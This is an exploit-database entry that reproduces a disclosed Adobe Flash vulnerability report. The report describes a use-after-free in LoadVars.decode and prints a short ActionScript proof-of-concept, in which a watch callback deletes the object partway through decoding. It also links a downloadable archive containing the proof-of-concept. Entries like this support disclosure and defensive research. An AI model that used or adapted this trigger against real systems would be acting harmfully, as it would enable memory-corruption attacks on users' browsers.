Adobe Flash - LoadVars.decode Use-After-Free

EDB-ID:

39463




Platform:

Multiple

Date:

2016-02-17


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Source: https://code.google.com/p/google-security-research/issues/detail?id=667

There is a use-after-free in LoadVars.decode. If a watch is set on the object that the parameters are being decoded into, and the watch deletes the object, then other methods are called on the deleted object after it is freed. A PoC is as follows:

var lv = new LoadVars();
var f = lv.decode;
var tf = this.createTextField("tf",1, 2, 3, 4, 5);
tf.natalie = "not test";
tf.watch("natalie", func);
f.call(tf, "natalie=test&bob=1");
trace(tf.natalie);


function func(){
	
	trace("here");
	tf.removeTextField();	
	return "test";

	}
	

A sample swf and fla are attached. This issue was reproduced in Chrome on 64-bit Ubuntu.


Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39463.zip